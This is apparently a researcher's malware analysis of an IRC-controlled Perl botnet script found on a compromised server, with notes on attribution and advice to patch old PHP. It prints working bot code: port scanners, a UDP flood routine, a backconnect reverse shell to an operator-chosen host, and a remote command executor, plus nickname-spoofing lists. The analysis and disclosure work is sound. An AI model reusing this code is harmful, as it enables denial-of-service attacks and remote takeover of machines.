# Quick scan if ($funcarg =~ /^ps (.*)/) { my $hostip="$1"; sendraw($IRC_cur_socket, "PRIVMSG $printl :\002\00312Portscanning\003\002: $1 \002\00312Ports:\003\002 default"); my (@aberta, %porta_banner); foreach my $porta (@portas) { my $scansock = IO::Socket::INET->new(PeerAddr => $hostip, PeerPort => $porta, Proto =>'tcp', Timeout => $portime); if ($scansock) { push (@aberta, $porta); $scansock->close; sendraw($IRC_cur_socket, "PRIVMSG $printl :Found: $porta"."/Open"); } } if (@aberta) { sendraw($IRC_cur_socket, "PRIVMSG $printl :Port Scan Complete with target: $1 "); } else { sendraw($IRC_cur_socket,"PRIVMSG $printl :\002[x]\0034 No open ports found on\002 $1"); [...]
The "Nmap"(?)
# NMAP, lol elsif ($funcarg =~ /^nmap\s+(.*)\s+(\d+)\s+(\d+)/) { my $hostname="$1"; my $portstart = "$2"; my $portend = "$3"; my (@abertas, %porta_banner); sendraw($IRC_cur_socket, "PRIVMSG $printl :\002\00312xMap Portscanning\003\002: $1 \002\00312Ports:\003\002 $2-$3"); foreach my $porta ($portstart..$portend) { my $scansock = IO::Socket::INET->new(PeerAddr => $hostname, PeerPort => $porta, Proto =>'tcp', Timeout => $portime); if ($scansock) { push (@abertas, $porta); $scansock->close; if ($xstats) { sendraw($IRC_cur_socket, "PRIVMSG $printl :Found: $porta"."/Open"); }}} if (@abertas) { sendraw($IRC_cur_socket, "PRIVMSG $printl :\002\00312Scan Complate\003\002"); } else { sendraw($IRC_cur_socket,"PRIVMSG $printl :\002\00312No ports found..\002"); }} [...]
UDP For Flood:
[...] elsif ($funcarg =~ /^udp\s+(.*)\s+(\d+)\s+(\d+)/) { return unless $pacotes; socket(Tr0x, PF_INET, SOCK_DGRAM, 17); my $alvo=inet_aton("$1"); my $porta = "$2"; my $tempo = "$3"; my $pacote; my $pacotese; my $fim = time + $tempo; my $pacota = 1; sendraw($IRC_cur_socket, "PRIVMSG $printl :\002\00312(Get BOMbs)\003 Attacking\002: $1 - \002Time\002: $tempo"."seconds"); while (($pacota == "1") && ($pacotes == "1")) { $pacota = 0 if ((time >= $fim) && ($tempo != "0")); $pacote=$rand x $rand x $rand; $porta = int(rand 65000) +1 if ($porta == "0"); send(Tr0x, 0, $pacote, sockaddr_in($porta, $alvo)) and $pacotese++ if ($pacotes == "1"); } if ($xstats) { sendraw($IRC_cur_socket, "PRIVMSG $printl :\002\00312(UDP Complete):\003\002 $1 - \002Send\002: $pacotese"."kb - \002Time\002: $tempo"."seconds");}} [...]
Backdoor, the "BackConnect"
# Backconnect elsif ($funcarg =~ /^back\s+(.*)\s+(\d+)/) { my $host = "$1"; my $porta = "$2"; my $proto = getprotobyname('tcp'); my $iaddr = inet_aton($host); my $paddr = sockaddr_in($porta, $iaddr); my $shell = "/bin/sh -i"; if ($^O eq "MSWin32") { $shell = "cmd.exe"; } socket(SOCKET, PF_INET, SOCK_STREAM, $proto) or die "socket: $!"; connect(SOCKET, $paddr) or die "connect: $!"; sendraw($IRC_cur_socket, "PRIVMSG $printl :\002[x] ->\0034 Injection ..."); open(STDIN, ">&SOCKET"); open(STDOUT, ">&SOCKET"); open(STDERR, ">&SOCKET"); system("$shell"); system("cd /tmp/.mrx"); close(STDIN); close(STDOUT); close(STDERR); [...]
Shell..
sub shell { return unless $shellaccess; my $printl=$_[0]; my $comando=$_[1]; if ($comando =~ /cd (.*)/) { chdir("$1") || msg("$printl", "cd: $1".": No such file or directory"); return; } elsif ($pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { my @resp=`$comando 2>&1 3>&1`; my $c=0; foreach my $linha (@resp) { $c++; chop $linha; sendraw($IRC_cur_socket, "PRIVMSG $printl :$linha"); if ($c >= "$linas_max") { $c=0; [...]
Preview Video for the etc Hack Toolkit packages used (is an evidence of crime)
I can not discuss the other tool kits found for I am running out of time to write..there are so many of them! But those tools really explain us a lot of details on what MO if the hack action is, you will see many tool-set with the ELF binaries insides, some are Open Source software that being mis-used for this malicious purpose. To make a good overview of the other tools used, I tried to open the archive of those hack-tools package one by one and recorded it in a video for you to view safely:
Who is the attacker?
The attack itself is controlled by a bad actor hidden behind an IRC connectivity , below I disclose the IRC configuration used by this case's attacker, contains the source of the IRC's IP, User's ID, IRC channel, Nicknames/Handles used for conducting the attack, is a check-mate:
my @xname = ("Googurl (C) 2006 xeQt","www.Google.com","* Im to lame to read Bitchx.doc *","BiatchX", "Tveita Gjengen","Bgjengen","Agjengen","locos","putas","spooon","Type-R Turbo","Civic R Turbo", "mIRC 6.1","* Im so lame i cant ready BitchX.doc *","Bill Gates","Cannon","Mtv","nos","nozzz", "Sport Crew","vTeam","Turbo","random","paypal","netscam","www.milw0rm.com","lee","av","freace", "trojan donkey","Monster Garage","Garage Inc.","Pimp Ma Shit","Pimp my ride","Freak out","Doch", "www.packetstormsecurity.org","www.linux.com","www.freebsd.org","Hello There","tyson","mekkkka", "Im just myself man","Can u get the clue?","Im not the only one","Fear the lions","mekka","nooo", "Dragons back","Turbo Quattro","Sport Quattro","aheh goofy","Just for phun","gBill","goa","Yesir", "Thats my mofo name","Snoooop Doggy Style...","Tricky Trickey","love, peace, and xeQt","rbot","ha", "Clap your hands","one two tree, bass","lions","Drugs, sex, and xtc","i hate that biatch","ali", "Go fuck yourself","whois meeee","Fatjoe Corp","Brooklyn Bounche","Dj Pulsedriver","lee","furu", "Random","You have no clue","This rocks","uranium","BinLaden","Ted Bundy","Charlie Cheeens","hans", "Will Smith","Freash Prince On IRC","Freash prince in bel air","Powered By PHPBB","mambo","ruy", "dj pulse","Powered By xeQt","Delux","2pac","Biggie","Fuck sadam","Allah","Im your god idiot","id", "Im to lame to read BitchX.doc","Boika","Diamonds","Jean claude Van dame","Arnold Schwartsneger", "Stig","Anothony","White Power","Just do it","vSmotor vs. Turbo","Nismo Skyline GT-R R34","MySquad", "Honda Civic Type-R","Maria Carrey","Terror Squad","I'm to lame to read BitchX.doc","w33d","hugo", "WinXP 1999 (C) Bill Gates","Microsoft windows xeQtxpress","xeQt vS Mrx Team","Apache httpd server", "arne","line","geir","terje","synne","linda","frode","my name?","teamrxPress","xeqters","asus power", "Crash Test Dummy","Madonna","vX power","Team Windows","Bill Gates","Bill Gatez","Thats my girl...", "Phunter","panter","Snaked","Hunted","Victums","PHPSH","mod_com_xQt","com_xeQter","com_team","assa", "Nokia, Connecting People...","BitchX","smoke and fly","com_xeQt_Performance","TeaMrx Performance", "xQt","Perlbot version vx9m0d v3","Googurl","Google lovers","xeQt_com","mrx_unit","com_asus","haist", "TeaMrx Crew","xQt vS TeaMrx","xeQt vS Mrx","Powered by TeaMrx","Powered by xQt","com_xQt_mrx","com_x", "com_teamrx","xeQt the way to go","Perl monks","perlhackers","perl genius","perl team","perl scanner", "San Francisco","New York Gangbang..","Team Norway","Team Europe","Team Germany","Team Work","jet lie");
################# # Random Ports ################# my @rports = ("6667");
my @Mrx = ("\001mIRC32 v5.91 K.Mardam-Bey\001","\001mIRC v6.2 Khaled Mardam-Bey\001", "\001mIRC v6.03 Khaled Mardam-Bey\001","\001mIRC v6.14 Khaled Mardam-Bey\001", "\001mIRC v6.15 Khaled Mardam-Bey\001","\001mIRC v6.16 Khaled Mardam-Bey\001", "\001mIRC v6.17 Khaled Mardam-Bey\001","\001mIRC v6.21 Khaled Mardam-Bey\001", "\001Snak for Macintosh 4.9.8 English\001", "\001DvC v0.1 PHP-5.1.1 based on Net_SmartIRC\001", "\001PIRCH98:WIN 95/98/WIN NT:1.0 (build 1.0.1.1190)\001", "\001xchat 2.6.2 Linux 2.6.18.5 [i686/2.67GHz]\001", "\001xchat:2.4.3:Linux 2.6.17-1.2142_FC4 [i686/2,00GHz]\001", "\001xchat:2.4.3:Linux 2.6.17-1.2142_FC4 [i686/1.70GHz]\001", "\001XChat-GNOME IRC Chat 0.16 Linux 2.6.20-8-generic [i686]\001", "\001ircN 7.27 + 7.0 - -\001","\001..(argon/1g) :bitchx-1.0c17\001", "\001ircN 8.00 - he tries to tell me what I put inside of me - \001", "\001FreeBSD!4.11-STABLE bitchx-1.0c18 - prevail[0123] :down with people\001", "\001BitchX-1.0c19+ by panasync - Linux 2.4.31 : Keep it to yourself!\001", "\001BitchX-1.0c19+ by panasync - Linux 2.4.33.3 : Keep it to yourself!\001", "\001BitchX-1.1-final+ by panasync - Linux 2.6.18.1 : Keep it to yourself!\001", "\001BitchX-1.0c19 by panasync - freebsd 4.10-STABLE : Keep it to yourself!\001", "\001BitchX-1.1-final+ by panasync - FreeBSD 4.5-STABLE : Keep it to yourself!\001", "\001BitchX-1.1-final+ by panasync - FreeBSD 6.0-RELEASE : Keep it to yourself!\001", "\001BitchX-1.1-final+ by panasync - FreeBSD 5.3-RELEASE : Keep it to yourself!\001", "\001bitchx-1.0c18 :tunnelvision/1.2\001","\001PnP 4.22 - http://www.pairc.com/\001", "\001BitchX-1.0c17/FreeBSD 4.10-RELEASE:(c)rackrock/bX [3.0.1キ9] : Keep it to yourself!\001", "\001P&P 4.22.2 (in development) + X Z P Bots, Sound, NickServ, ChanServ, Extras\001", "\001HydraIRC v0.3.148 (18/Jan/2005) by Dominic Clifton aka Hydra - #HydraIRC on EFNet\001", "\001irssi v0.8.10 - running on Linux i586\001","\001irssi v0.8.10 - running on FreeBSD i386\001", "\001ircII 20050423+ScrollZ 1.9.5 (19.12.2004)+Cdcc v1.6mods v1.0 by acidflash - Almost there\001", "\001ircII 20050423+ScrollZ 1.9.5 (19.12.2004)+Cdcc v1.8+OperMods v1.0 by acidflash - Almost there\001");
[...]
# xeQt
#my $nick = "bq"; my $nick = $nickname[rand scalar @nickname]; my $realname = $xname[rand scalar @xname]; my $ircname = $xident[rand scalar @xident]; my $porta = $rports[rand scalar @rports]; my $xproc = $fakeps[rand scalar @fakeps]; my $Mrx = $Mrx[rand scalar @Mrx]; my $version = 'PowerBots (C) GohacK';
[...]
Moral of the story
1. Attacks that seems coming from AAA country might not really coming from AAA, please be careful about this. 2. What stated/written as Romanian Hacker/AntiSec, was actually has a taste of skids from OTHER territory to me, by analyzing some keywords that was modified in the source code of the attacker script, other attack tools, and after checking deeper to their IRC channel. 3. Hardening your web server and if you use old PHP... #PatchNow!
Kudoz The Team Work!
MalMouse is explaining in his blog about HOW WIDE the target of these attack:
We are uploading the sample via FTP for Law Enforcement Evidence Collectiing and Security Research purpose only, we don't share the sample for the requester with te private address nor twitter account, so please prepare your FTP account and contact us via this post's comment section (not to be published!) with mentioning your real name, your entity and email address for the reply. Thank you in advance. Below is the archive snapshot:
The account appeared in Skype Directory is showing same handle name used in promoting the Shadow Logger in some forums: 
